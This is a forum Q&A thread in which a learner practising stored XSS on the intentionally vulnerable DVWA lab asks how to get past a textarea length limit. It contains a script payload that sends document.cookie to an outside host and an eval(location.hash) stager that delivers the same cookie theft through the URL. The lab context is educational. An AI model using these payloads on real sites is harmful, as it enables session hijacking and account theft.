# Message text area is not accepting more than a certain amount of words in website

Tags: javascript, php, html, security

I am learning about xss exploitation with this web app called damn vulnerable web app found here http://www.dvwa.co.uk/
which intentionally contains web vulnerabilities.

I am trying to add javascript in to a message box like this see image

http://postimg.org/image/w6yeoj331/

It only accepts a certain amount of words and then doesn't allow more than that, which doesn't allow me to continue with the xss attack.
I am trying to type this in the message box:

```
<script>new Image().src="http://192.168.1.14/cookie.php?"+document.cookie;</script>
```

Here is the php script that deals with the message and name text areas

```
<?php

    if(isset($_POST['btnSign']))
    {

       $message = trim($_POST['mtxMessage']);
       $name    = trim($_POST['txtName']);

       // Sanitize message input
       $message = stripslashes($message);
       $message = mysql_real_escape_string($message);

       // Sanitize name input
       $name = mysql_real_escape_string($name);

       $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";

       $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );

    }

    ?>
```

Comment: Maybe your colum(s) have a fixed constraint themselves? If they are set to VARCHAR(50), I counted 84 chars. in your example. Increase it to 100 to test, IF that is the case.

Comment: tried that doesn't seem to have any effect.

Comment: Did you check to see if there's anything that needs to be done in the SETUP?

Comment: yes, it just required database setup.

Comment: I don't know what else it could be then.

Answer (score 1, accepted):

It is probably some JavaScript on the page limiting the amount of text you can enter in the textarea - try disabling JavaScript.

You could also try [Firebug](http://getfirebug.com/) which will allow you to modify HTML content or JavaScript in the page to remove the length restrictions.

Alternatively you can use an intercepting proxy such as [ZAP](https://code.google.com/p/zaproxy/wiki/HelpStartConceptsIntercept) or [Burp Suite](http://portswigger.net/burp/) to intercept your POST request and then modify the request in the proxy.

Another attack vector could be to use `<script>eval(location.hash.substring(1))</script>` in the textarea and then add your code in the URL by prefixing with a hash (`#`).

(e.g. `www.example.com/page.php#new Image().src="http://192.168.1.14/cookie.php?"+document.cookie;`)

This attack would make the page vulnerable to reflected XSS through use of a stored XSS vulnerability.

Comment: fixed it now I changed the maxlength to accept more characters within the textarea.

Answer (score 0):

this solution worked perfect for me

go to -> C:\XAMPP\htdocs\DVWA-1.0.8\vulnerabilities\xss_s 
enter to the index.php file using notepad++

ctrl+f and search for textarea, then look at that line for maxlentgh
change it from (example -> maxlength=\"50) to what ever you want

best of luck!

Answer (score 0):

1) Right Click the message box and inspect element
2) Change the max character length to 999
3) Press F12